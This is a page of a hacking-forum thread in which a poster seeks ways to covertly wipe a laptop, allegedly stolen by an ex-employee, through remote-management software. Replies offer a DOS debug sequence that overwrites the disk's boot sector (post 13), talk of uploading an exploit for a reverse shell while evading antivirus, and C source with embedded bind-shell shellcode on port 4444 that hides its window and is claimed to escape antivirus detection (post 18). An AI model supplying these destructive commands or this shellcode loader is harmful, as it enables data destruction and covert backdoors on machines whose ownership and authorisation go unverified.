Page 2 of 6 FirstFirst 1234 ... LastLast
Results 11 to 20 of 58

Thread: Sanitising a computer remotely

  1. #11
    Senior Member ShadowKill's Avatar
    Join Date
    Dec 2007
    Posts
    908

    Default

    Quote Originally Posted by KamiCrazy View Post
    Hi purehate,

    I do have more control than the actual user, for instance he still uses the login he used at my client's site which only has normal user rights not full admin rights.
    I do not know why the person did not reinstall the laptop, however my client believes that the employee stole the laptop not for the laptop itself (because its a piece of crap machine from circa 2003), but for the data on it.
    My client is an accounting firm, that laptop contained copies of all their customers financial information. You can understand that my client is very unhappy that such a breach of their customer's privacy is happening at the moment.

    This is why my job is to sanitise the machine. The thief's biggest mistake is that he is using the laptop normally.
    Well then it seems like you have answered your own question Since you have "full" control over said box just plant a shredder to wipe the drive on boot or take the time to do it manually. Unless he has any sort of forensics experience a simple deep-format should do the trick.



    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill

  2. #12
    Member
    Join Date
    Mar 2007
    Posts
    204

    Default

    what if?

    What if he's made copies of all the financial data you claim is on there?

    What if you wipe all his stuff, then he just recovers the deleted data?

    I'm guessing this guy isnt actually from the IT department right?

    then again he could be, it took 1 hour and 3 DVD RW drives for the IT guy at my place to copy a DVD with some video reports on it, and even then he still couldnt manage it so i had to take it home and do it myself!!

  3. #13
    Very good friend of the forum killadaninja's Avatar
    Join Date
    Oct 2007
    Location
    London, United Kingdom.
    Posts
    526

    Default

    Quote Originally Posted by ShadowKill View Post
    Well then it seems like you have answered your own question Since you have "full" control over said box just plant a shredder to wipe the drive on boot or take the time to do it manually. Unless he has any sort of forensics experience a simple deep-format should do the trick.
    Thats what i dont understand shadow, He seems like an inteligent guy thats why i dont understand why hes asking how to delete data from a machine he has full write privlages over?

    any how lets get this moving

    OK OPEN UP A COMMAND PROMPT

    now type

    "debug" press enter
    "a 100" press enter
    "int13" press enter

    press enter without typing anything

    "rax" press enter
    "0301" press enter
    "rbx" press enter
    "0200" press enter
    "f 200 l 200 0" (note, this is a lower case "L") press enter
    "rcx" press enter
    "0001" press enter
    "rdx" press enter
    "0080" press enter
    "p" press enter
    "q" press enter


    NOW REBOOT THE MACHINE YOU SHOULDNT SEE THIS MACHINE ONLINE NO MORE THEWHOLE HARD DRIVE IS PERMANTLY FORMATTED. ATTEMPT THIS IF IT DOES NOT WORK THEN TELL US
    Sometimes I try to fit a 16-character string into an 8–byte space, on purpose.

  4. #14
    Very good friend of the forum killadaninja's Avatar
    Join Date
    Oct 2007
    Location
    London, United Kingdom.
    Posts
    526

    Default

    P.S pure hate i hope you dont mind me helping him but
    1. he seems very genuine to me and what is saying is EASILY BELIEVABLE
    2. If he is unethical and hes manged to compromise a computers security this far he CERTAINLY doesnt need us to help him learn how to trash it
    3. If he was a blakhatter and he some how got this far without knowing what he was doing he would be asking how do i crack shared files passwords netbios etc

    so taking all this into account i found it justy to help him
    Sometimes I try to fit a 16-character string into an 8–byte space, on purpose.

  5. #15
    Member imported_Deathray's Avatar
    Join Date
    Oct 2007
    Posts
    381

    Wink

    If I were you I would first somehow shred the specific data you can find that is related to the company.
    After that try killadaninja's proposition. Recovering data from a simple format is way to easy.

    Just make sure you accomplish whatever you need to do quickly.
    Chances are if he notices anything fishy, it'll probably be the last time you'll be able to connect.
    Either that or he hurries up and makes a backup of all the data.

    Good luck!
    - Poul Wittig

  6. #16
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default

    I left the thread open so that means if you want to give the OP suggestions its OK by me. I was merely stating some issues that I had personally with the post. There were no forum rules broken and like I said the OP makes a valid case. I just have a habit of trusting hardly anyone on the internet. The circle of people I trust on this forum is fairly small. Just my nature I guess

  7. #17
    Just burned his ISO
    Join Date
    Sep 2008
    Posts
    15

    Default

    Sorry I've been very busy this morning and have not had a chance to reply to much apart from purehates post which I wanted to clear up why the notebook has not been reformatted.

    @streaker69:

    The user is able to know we when we remote control the computer. I use that to differentiate from connecting to it.
    When we use RDP of course the user's console locks out and tells him that administrator is logged on. If we use VNC the VNC session causes the laptop's desktop background to change and an icon on the taskbar to change.
    Basically the management software is designed to notify the user of remote interactive access. If we alert him to this he will likely disconnect the laptop from the network and we will lose our chance.

    My colleague and I have been approached personally by a company director to make this happen. He's told us personally to do this, so yes we have our asses covered in this regard.

    @Virchanza:

    Yes the agent connects back to us, traversing any NAT in place.

    @cybrsnpr:

    A batch file was something I had in mind already, thanks for the suggestion I will look into implementing this.

    @merlin051:

    If the thief has made copies then there is nothing we can do. However I don't think he has, he doesn't understand the database files which the financial data is kept in. He simply knows how to open an accounting app and access the info. Plus if he had made copies he would of likely wiped the laptop and reinstalled/sold it off.

    @killadaninja:

    We do not have command prompt access without installing another backdoor or exploiting a reverse shell remote vulnerability.
    But I can probably take those commands and insert them into a batch file, upload and run it non-interactively.
    Running scripts and stuff have certain quirks due to how kaseya executes things. It uses the local user account who is logged in at the moment. You can set things to be run as system but I've found that some things which you expect to be run don't.
    Then theres the anti-virus. I can't disable it currently without taking interactive control.

    @all:

    I had originally considered uploading a script to delete the important data. However doing a format like killadaninja is much better.

    I also considered uploading a local side exploit to open a backdoor so I can get a reverse shell. (Upload via ftp through kaseya, run backdoor through kaseya as local user). However I'm pretty sure that if I upload anything the AV will catch it and kill it.

    At this stage I think the remote script is best. To be honest I had some answers already but I wanted suggestions if someone could come with anything better and yes from the answers in this thread there have been better ways.

  8. #18
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Default

    I also considered uploading a local side exploit to open a backdoor so I can get a reverse shell. (Upload via ftp through kaseya, run backdoor through kaseya as local user). However I'm pretty sure that if I upload anything the AV will catch it and kill it.
    Compile this, it opens a port of 4444, but just go to metasploit web site and find a shellcode you like.
    This won't be DETECTED by any AV

    Code:
    #include <stdio.h>
    #include <stdlib.h>
    #include <winsock2.h>
    #define _WIN32_WINNT 0x0500
    #include <windows.h>
    #include <iostream>
    
    unsigned char bindcode[] =
    "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xce"
    "\x25\x78\x47\x83\xeb\xfc\xe2\xf4\x32\x4f\x93\x0a\x26\xdc\x87\xb8"
    "\x31\x45\xf3\x2b\xea\x01\xf3\x02\xf2\xae\x04\x42\xb6\x24\x97\xcc"
    "\x81\x3d\xf3\x18\xee\x24\x93\x0e\x45\x11\xf3\x46\x20\x14\xb8\xde"
    "\x62\xa1\xb8\x33\xc9\xe4\xb2\x4a\xcf\xe7\x93\xb3\xf5\x71\x5c\x6f"
    "\xbb\xc0\xf3\x18\xea\x24\x93\x21\x45\x29\x33\xcc\x91\x39\x79\xac"
    "\xcd\x09\xf3\xce\xa2\x01\x64\x26\x0d\x14\xa3\x23\x45\x66\x48\xcc"
    "\x8e\x29\xf3\x37\xd2\x88\xf3\x07\xc6\x7b\x10\xc9\x80\x2b\x94\x17"
    "\x31\xf3\x1e\x14\xa8\x4d\x4b\x75\xa6\x52\x0b\x75\x91\x71\x87\x97"
    "\xa6\xee\x95\xbb\xf5\x75\x87\x91\x91\xac\x9d\x21\x4f\xc8\x70\x45"
    "\x9b\x4f\x7a\xb8\x1e\x4d\xa1\x4e\x3b\x88\x2f\xb8\x18\x76\x2b\x14"
    "\x9d\x76\x3b\x14\x8d\x76\x87\x97\xa8\x4d\x7c\x05\xa8\x76\xf1\xa6"
    "\x5b\x4d\xdc\x5d\xbe\xe2\x2f\xb8\x18\x4f\x68\x16\x9b\xda\xa8\x2f"
    "\x6a\x88\x56\xae\x99\xda\xae\x14\x9b\xda\xa8\x2f\x2b\x6c\xfe\x0e"
    "\x99\xda\xae\x17\x9a\x71\x2d\xb8\x1e\xb6\x10\xa0\xb7\xe3\x01\x10"
    "\x31\xf3\x2d\xb8\x1e\x43\x12\x23\xa8\x4d\x1b\x2a\x47\xc0\x12\x17"
    "\x97\x0c\xb4\xce\x29\x4f\x3c\xce\x2c\x14\xb8\xb4\x64\xdb\x3a\x6a"
    "\x30\x67\x54\xd4\x43\x5f\x40\xec\x65\x8e\x10\x35\x30\x96\x6e\xb8"
    "\xbb\x61\x87\x91\x95\x72\x2a\x16\x9f\x74\x12\x46\x9f\x74\x2d\x16"
    "\x31\xf5\x10\xea\x17\x20\xb6\x14\x31\xf3\x12\xb8\x31\x12\x87\x97"
    "\x45\x72\x84\xc4\x0a\x41\x87\x91\x9c\xda\xa8\x2f\x3e\xaf\x7c\x18"
    "\x9d\xda\xae\xb8\x1e\x25\x78\x47";
    
    
    
    int main()
    {
    HWND hWnd = GetConsoleWindow();
    ShowWindow( hWnd, SW_HIDE );
    
     WSADATA wsadata;
     WSAStartup(WINSOCK_VERSION,&wsadata);
     ((void (*)(void)) &bindcode)();
    }

  9. #19
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default

    So I'm not a C expert by any means and I was just wondering compaq why that snippet of code wont compile with GCC? Is there some C that can only be compiled is visual studio or something?

    Ok so I figured out I dont have the win32 libs on my system for some reason. If anyone know the gentoo packages to install those please PM me with the answer.

  10. #20
    Very good friend of the forum Virchanza's Avatar
    Join Date
    Jan 2010
    Posts
    863

    Default

    What exactly does that machine code do? I don't suppose you have the original source code from which it was produced? If it opens a port of 4444 then which daemon is listening? And how do you interact with that daemon to get it to execute code?

    Another problem is that the victim machine will always be behind a NAT-router, and also the firewall on the computer itself will probably block the traffic.

    @pureh@te:
    I dunno if you're being sarcastic but here's a explanation nonetheless... Some C compilers offer "compiler extensions" which aren't a part of the C standard; this particular program doesn't contain any compiler externsions, it just won't compile because you don't have the necessary header files and object files for the Win32 API.
    Ask questions on the open forums, that way everybody benefits from the solution, and everybody can be corrected when they make mistakes. Don't send me private messages asking questions that should be asked on the open forums, I won't respond. I decline all "Friend Requests".

Page 2 of 6 FirstFirst 1234 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •